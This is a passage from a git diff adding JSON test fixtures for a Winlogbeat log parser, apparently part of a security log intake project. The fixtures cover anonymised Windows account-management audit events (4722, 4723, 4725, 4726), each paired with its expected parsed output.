Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4722", + "kind": "event", + "module": "security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:53:57.535000Z", + "action": { + "id": 4722, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserName": "account-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "ACC_NAME" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account-name" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account-name", + "target": { + "domain": "DOMAIN", + "name": "ACC_NAME" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4722", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a13c3fc" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042939152", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json new file mode 100644 index 000000000..34874fdfb --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4723.json @@ -0,0 +1,112 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4723", + "kind": "event", + "module": "security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:59:04.757000Z", + "action": { + "id": 4723, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserName": "ACCOUNT", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "123456-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4723", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a28ebbf" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13043050897", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json new file mode 100644 index 000000000..31cca5f97 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4725.json @@ -0,0 +1,111 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4725", + "kind": "event", + "module": "security", + "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:41:11.055000Z", + "action": { + "id": 4725, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserName": "jdoe", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-4-5-6", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "jdoe", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4725", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x493fa12d" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042691344", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json new file mode 100644 index 000000000..e147e2eb4 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4726.json @@ -0,0 +1,84 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}" + }, + "expected": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T07:58:13.288000Z", + "action": { + "id": 4726, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3005c1f76", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "name": "hostname", + "type": "winlogbeat", + "version": "7.17.1" + }, + "host": { + "name": "hostname.domain.net" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "doe.j" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "doe.j", + "target": { + "domain": "DOMAIN", + "name": "smithee.a" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.domain.net", + "event_id": "4726", + "logon": { + "id": "0x3005c1f76" + }, + "process": { + "pid": 632, + "thread": { + "id": 2056 + } + }, + "provider_guid": 